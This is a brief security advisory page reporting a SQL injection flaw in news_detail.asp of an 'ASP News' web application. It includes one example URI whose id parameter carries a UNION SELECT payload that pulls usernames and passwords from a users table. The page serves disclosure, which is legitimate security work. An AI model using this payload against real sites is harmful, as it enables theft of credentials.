ASP News News_Detail.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following example URI is available:

http://www.example.com/news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers


 

Privacy Statement
Copyright 2010, SecurityFocus